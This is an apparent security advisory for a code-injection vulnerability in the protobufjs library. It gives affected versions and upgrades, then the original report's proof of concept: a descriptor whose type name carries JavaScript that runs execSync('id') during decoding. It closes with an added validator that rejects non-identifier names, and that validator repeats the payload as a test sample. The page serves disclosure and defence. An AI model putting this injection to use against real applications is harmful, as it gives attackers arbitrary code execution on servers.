CVSS 4.0 score (GHSA): 9.4

Malicious Code Execution in protobufjs

GHSA-xq3m-2v4x-88gg
Summary

protobufjs compiles protobuf definitions into JavaScript functions. An attacker who can influence the definitions an application loads, whether by modifying the definition files themselves or by getting the application to load attacker-supplied definitions, can place JavaScript in the "type" fields of a definition and have it executed when a message using that definition is decoded, giving arbitrary code execution in the Node.js process (and therefore control of the affected website or server). Treat protobuf definitions as code: load them only from trusted sources, and validate any user-controlled data before using it to build definitions.

What to do
  • If you are on protobufjs 8.x, update to 8.0.1.
  • If you are on protobufjs 7.x or earlier, update to 7.5.5.
Affected software
Ecosystem  Vendor   Product     Affected versions   Fix
npm        fenster  protobufjs  >= 8.0.0, < 8.0.1   upgrade to 8.0.1
npm        fenster  protobufjs  < 7.5.5             upgrade to 7.5.5
Original title
Arbitrary code execution in protobufjs
Original description
### Summary
protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.

### Details
Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.

### PoC
```js
const protobuf = require('protobufjs');

// Descriptor in the JSON form accepted by Root.fromJSON(). The message type
// referenced by User.data is named with a JS payload; the trailing
// "function X" keeps the source syntactically valid once protobufjs appends
// its own decoder body when it compiles the type.
const maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`);
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");

// Encoded User { id: 1, data: { content: "hello" } }:
//   08 01          field 1 (id), varint 1
//   12 07          field 2 (data), 7-byte embedded message
//   0a 05 "hello"  Data.content = "hello"
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);

// Decoding compiles the decoder for the malicious type, which runs the payload
// (prints the output of `id`); the error that follows is swallowed.
try {
  UserType.decode(userBytes);
} catch (e) {}
```

### Impact
Remote code execution when attackers can control the protobuf definition files.
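As an added example (not protobufjs code and not part of the advisory), the following is a pre-load check for descriptor JSON of the shape `Root.fromJSON()` accepts. It rejects any message, field, enum value, service, method, or type-reference name that is not a protobuf identifier (`ident = letter { letter | digit | "_" }`, optionally dotted and leading-dot qualified for type references), which is exactly where the PoC above hides its payload. The `validateDescriptor` helper and both sample descriptors are constructed for this page; the malicious one mirrors the PoC. This is defense in depth for applications that must accept descriptors from less-trusted sources, not a substitute for upgrading to a fixed version.

```javascript
// Added example: reject untrusted protobufjs JSON descriptors whose names are not
// valid protobuf identifiers before they reach protobuf.Root.fromJSON().
// Hypothetical helper written for this page; it is not part of protobufjs.

// protobuf identifier grammar: ident = letter { letter | decimalDigit | "_" }.
// A leading "_" is accepted as well, as protoc does.
const IDENT = /^[A-Za-z_][A-Za-z0-9_]*$/;
// Type references may be relative ("pkg.Msg") or fully qualified (".pkg.Msg").
const TYPE_REF = /^\.?[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*$/;

function check(re, value, where, problems) {
  if (typeof value !== 'string' || !re.test(value)) {
    problems.push(`${where}: invalid name ${JSON.stringify(value)}`);
  }
}

// Walk a descriptor of the shape Root.fromJSON() accepts:
// { nested: { Name: { fields: { f: { type, id, keyType? } }, nested?, values?, methods?, oneofs? } } }
function walk(node, path, problems) {
  if (!node || typeof node !== 'object') return;
  for (const [name, child] of Object.entries(node.nested || {})) {
    const here = path ? `${path}.${name}` : name;
    check(IDENT, name, here, problems);                 // message / enum / service name
    if (!child || typeof child !== 'object') continue;
    for (const [fname, field] of Object.entries(child.fields || {})) {
      check(IDENT, fname, `${here}.${fname}`, problems);
      if (field && typeof field === 'object') {
        check(TYPE_REF, field.type, `${here}.${fname}.type`, problems);
        if ('keyType' in field) check(IDENT, field.keyType, `${here}.${fname}.keyType`, problems);
      }
    }
    for (const oneof of Object.keys(child.oneofs || {})) check(IDENT, oneof, `${here}.${oneof}`, problems);
    for (const v of Object.keys(child.values || {})) check(IDENT, v, `${here}.${v}`, problems); // enum values
    for (const [mname, m] of Object.entries(child.methods || {})) {                            // service methods
      check(IDENT, mname, `${here}.${mname}`, problems);
      if (m && typeof m === 'object') {
        check(TYPE_REF, m.requestType, `${here}.${mname}.requestType`, problems);
        check(TYPE_REF, m.responseType, `${here}.${mname}.responseType`, problems);
      }
    }
    walk(child, here, problems); // nested messages and enums
  }
}

// Returns the list of offending names; an empty list means every name is a
// plain identifier and the descriptor can be handed to Root.fromJSON().
function validateDescriptor(descriptor) {
  const problems = [];
  walk(descriptor, '', problems);
  return problems;
}

// Constructed sample: the advisory's PoC descriptor, payload carried in a type name.
const PAYLOAD = "Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\nfunction X";
const maliciousDescriptor = {
  nested: {
    User: { fields: { id: { type: 'int32', id: 1 }, data: { type: PAYLOAD, id: 2 } } },
    [PAYLOAD]: { fields: { content: { type: 'string', id: 1 } } },
  },
};
// Constructed sample: the same schema with an honest type name.
const benignDescriptor = {
  nested: {
    User: { fields: { id: { type: 'int32', id: 1 }, data: { type: 'Data', id: 2 } } },
    Data: { fields: { content: { type: 'string', id: 1 } } },
  },
};

console.log('malicious:', validateDescriptor(maliciousDescriptor)); // two offending names
console.log('benign:', validateDescriptor(benignDescriptor));       // []
```

Run the check on anything that arrives over the network or from a user-writable location and refuse to call `Root.fromJSON()` (or build a `Root` at all) if it returns any problems; the same identifier rule can be applied to names in `.proto` text if you accept that form instead.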
Source: GHSA · CVSS 4.0: 9.4
Vulnerability type
CWE-94 Code Injection
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026